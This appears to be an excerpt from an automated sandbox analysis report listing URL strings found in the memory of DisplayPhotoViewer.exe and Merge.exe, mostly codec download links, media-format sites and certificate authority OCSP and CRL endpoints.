                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://mediaarea.net/DX50;;;YUV;4:2:0
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://mediaarea.net/XVID;;;YUV;4:2:0
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://mediaxw.sourceforge.net
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://mediaxw.sourceforge.net;;;YUV
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://mirror01.iptelecom.net.ua/~video/codecs/Autodesk.Animator.v1.11.Codec.exe
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://mirror01.iptelecom.net.ua/~video/codecs/Autodesk.Animator.v1.11.Codec.exe;;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://mirror01.iptelecom.net.ua/~video/codecs/Autodesk.Animator.v1.11.Codec.exe;;;RGB
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://mirror01.iptelecom.net.ua/~video/codecs/Avid.VfW.codec.v2.0d2.exe
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://mirror01.iptelecom.net.ua/~video/codecs/Avid.VfW.codec.v2.0d2.exe;;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://mirror01.iptelecom.net.ua/~video/codecs/Avid.VfW.codec.v2.0d2.exe;;;;
                                Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://mirror01.iptelecom.net.ua/~video/codecs/Avid.VfW.codec.v2.0d2.exe;;;YUV
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://mirror01.iptelecom.net.ua/~video/codecs/Avid.VfW.codec.v2.0d2.exe;;;YUV;
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://mirror01.iptelecom.net.ua/~video/codecs/CUseeMe.JPEG.CODEC.v1.17.exe
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://mirror01.iptelecom.net.ua/~video/codecs/CUseeMe.JPEG.CODEC.v1.17.exe;;;YUV
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://mirror01.iptelecom.net.ua/~video/codecs/LEAD.MCMP-JPEG.v1.016.codec.exe
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://mirror01.iptelecom.net.ua/~video/codecs/LEAD.MCMP-JPEG.v1.016.codec.exe;;;
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://mirror01.iptelecom.net.ua/~video/codecs/LEAD.MCMP-JPEG.v1.016.codec.exe;;;YUV
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://mirror01.iptelecom.net.ua/~video/codecs/PICVideo.Lossless.JPEG.codec.v2.10.27.exe
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://mirror01.iptelecom.net.ua/~video/codecs/PICVideo.Lossless.JPEG.codec.v2.10.27.exe;;;YUV
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://mirror01.iptelecom.net.ua/~video/codecs/PICVideo.MJPG.v2.10.27.codec.exe
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://mirror01.iptelecom.net.ua/~video/codecs/PICVideo.MJPG.v2.10.27.codec.exe;;;YUV
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://mirror01.iptelecom.net.ua/~video/codecs/Pinnacle.ReelTime.v2.5.software.only.codec.exe
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://mirror01.iptelecom.net.ua/~video/codecs/Pinnacle.ReelTime.v2.5.software.only.codec.exe;;;
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://mirror01.iptelecom.net.ua/~video/codecs/Pinnacle.ReelTime.v2.5.software.only.codec.exe;;;YUV
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://mirror01.iptelecom.net.ua/~video/codecs/miroVIDEO-XL.codec.v2.2.exe
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://mirror01.iptelecom.net.ua/~video/codecs/miroVIDEO-XL.codec.v2.2.exe;;;YUV
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://mysif.ru/SIF1_dd_Eng.htm;;;
Source: Merge.exe, 00000000.00000003.2541749470.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp, Merge.exe, 00000000.00000003.2541707986.0000000003951000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0A
Source: Merge.exe, 00000000.00000003.2541749470.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp, Merge.exe, 00000000.00000003.2541707986.0000000003951000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0C
Source: Merge.exe, 00000000.00000003.2541749470.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp, Merge.exe, 00000000.00000003.2541707986.0000000003951000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0X
Source: Merge.exe, 00000000.00000003.2541749470.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp, Merge.exe, 00000000.00000003.2541707986.0000000003951000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: Merge.exe, 00000000.00000003.2541749470.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp, Merge.exe, 00000000.00000003.2541707986.0000000003951000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: DisplayPhotoViewer.exe, 00000006.00000003.2941656091.000000000A712000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A5DF000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2942350637.000000000A7C7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943414129.000000000A63F000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943326957.000000000A6C1000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950813744.000000000A6CC000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2644059038.000000000A635000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2935754042.0000000007A36000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000ADDA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943743795.000000000A7D7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2634861679.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B49F000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2945078225.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3116425727.0000000007AF9000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A5BE000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2951391104.000000000A743000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2934851183.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A4AA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943177680.000000000A773000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940933364.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000B288000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.thawte.com0
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://opus-codec.org
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://opus-codec.org/;Lossy
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://pbcore.org/xsd/pbcore-2.0.xsd
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://pbcore.org/xsd/pbcore-2.0.xsdhttp://www.pbcore.org/PBCore/PBCoreNamespace.html
Source: DisplayPhotoViewer.exe, 00000006.00000002.3214284754.000000006B041000.00000002.00000001.01000000.00000007.sdmp | String found in binary or memory: http://quoteunquoteapps.com)
Source: DisplayPhotoViewer.exe, 00000006.00000002.3214284754.000000006B041000.00000002.00000001.01000000.00000007.sdmp | String found in binary or memory: http://quoteunquoteapps.comhttp://basicrecipe.comCopyright
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://rarlabs.com
Source: DisplayPhotoViewer.exe, 00000006.00000002.3214284754.000000006B041000.00000002.00000001.01000000.00000007.sdmp | String found in binary or memory: http://scripts.sil.org/OFL
Source: DisplayPhotoViewer.exe, 00000006.00000002.3214284754.000000006B041000.00000002.00000001.01000000.00000007.sdmp | String found in binary or memory: http://scripts.sil.org/OFLCopyright
Source: Merge.exe, 00000000.00000003.2541749470.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp, Merge.exe, 00000000.00000003.2541707986.0000000003951000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: Merge.exe, 00000000.00000003.2541749470.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp, Merge.exe, 00000000.00000003.2541707986.0000000003951000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: DisplayPhotoViewer.exe, 00000006.00000003.2941656091.000000000A712000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A5DF000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2942350637.000000000A7C7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943414129.000000000A63F000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943326957.000000000A6C1000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950813744.000000000A6CC000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2644059038.000000000A635000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2935754042.0000000007A36000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000ADDA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943743795.000000000A7D7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2634861679.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B49F000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2945078225.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3116425727.0000000007AF9000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2951391104.000000000A743000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2934851183.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A4AA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943177680.000000000A773000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940933364.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000B288000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940493728.000000000A66E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://sf.symcb.com/sf.crl0f
Source: DisplayPhotoViewer.exe, 00000006.00000003.2941656091.000000000A712000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A5DF000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2942350637.000000000A7C7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943414129.000000000A63F000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2644381259.000000000B9CB000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943326957.000000000A6C1000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950813744.000000000A6CC000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2644059038.000000000A635000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2935754042.0000000007A36000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000ADDA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943743795.000000000A7D7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2634861679.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B49F000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2945078225.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3116425727.0000000007AF9000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2951391104.000000000A743000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2934851183.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A4AA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943177680.000000000A773000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940933364.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000B288000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://sf.symcb.com/sf.crt0
Source: DisplayPhotoViewer.exe, 00000006.00000003.2941656091.000000000A712000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A5DF000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2942350637.000000000A7C7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943414129.000000000A63F000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2644381259.000000000B9CB000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943326957.000000000A6C1000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950813744.000000000A6CC000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2644059038.000000000A635000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2935754042.0000000007A36000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000ADDA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943743795.000000000A7D7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2634861679.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B49F000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2945078225.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3116425727.0000000007AF9000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2951391104.000000000A743000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2934851183.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A4AA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943177680.000000000A773000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940933364.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000B288000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://sf.symcd.com0&
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://sourceforge.net/project/showfiles.php?group_id=82303&package_id=84358
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://sourceforge.net/project/showfiles.php?group_id=82303&package_id=84358;;;
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://sourceforge.net/project/showfiles.php?group_id=82303&package_id=84358;;;YUV
Source: DisplayPhotoViewer.exe, 00000006.00000003.2601442890.0000000007A55000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://sourceforge.net/projects
Source: DisplayPhotoViewer.exe, 00000006.00000003.2935754042.0000000007954000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2601442890.0000000007A55000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3113621505.000000000798E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://sourceforge.net/projects/mediainfo/
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://standards.iso.org/ittf/PubliclyAvailableStandards/MPEG-7_schema_files/mpeg7-v2.xsd
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://standards.iso.org/ittf/PubliclyAvailableStandards/MPEG-7_schema_files/mpeg7-v2.xsdmpeg7:Descr
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://thbeck.de/Tak/Tak.html;Lossless
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://true-audio.com
Source: DisplayPhotoViewer.exe, 00000006.00000003.2941656091.000000000A712000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A5DF000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2942350637.000000000A7C7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943414129.000000000A63F000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943326957.000000000A6C1000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950813744.000000000A6CC000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2644059038.000000000A635000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2935754042.0000000007A36000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000ADDA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943743795.000000000A7D7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2634861679.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B49F000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2945078225.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3116425727.0000000007AF9000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A5BE000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2951391104.000000000A743000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2934851183.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A4AA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943177680.000000000A773000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940933364.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000B288000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: DisplayPhotoViewer.exe, 00000006.00000003.2941656091.000000000A712000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A5DF000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2942350637.000000000A7C7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943414129.000000000A63F000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943326957.000000000A6C1000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950813744.000000000A6CC000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2644059038.000000000A635000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2935754042.0000000007A36000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000ADDA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943743795.000000000A7D7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2634861679.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B49F000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2945078225.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3116425727.0000000007AF9000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A5BE000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2951391104.000000000A743000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2934851183.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A4AA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943177680.000000000A773000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940933364.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000B288000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: DisplayPhotoViewer.exe, 00000006.00000003.2941656091.000000000A712000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A5DF000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2942350637.000000000A7C7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943414129.000000000A63F000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943326957.000000000A6C1000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2950813744.000000000A6CC000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2644059038.000000000A635000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2935754042.0000000007A36000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000ADDA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943743795.000000000A7D7000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2634861679.000000000A65E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B49F000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2945078225.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3116425727.0000000007AF9000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A5BE000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2951391104.000000000A743000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2934851183.000000000A66E000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2614739291.000000000A4AA000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2943177680.000000000A773000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2940933364.000000000A777000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000B288000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: http://umezawa.dyndns.info/archive/utvideo;;;RGB;4:4:4
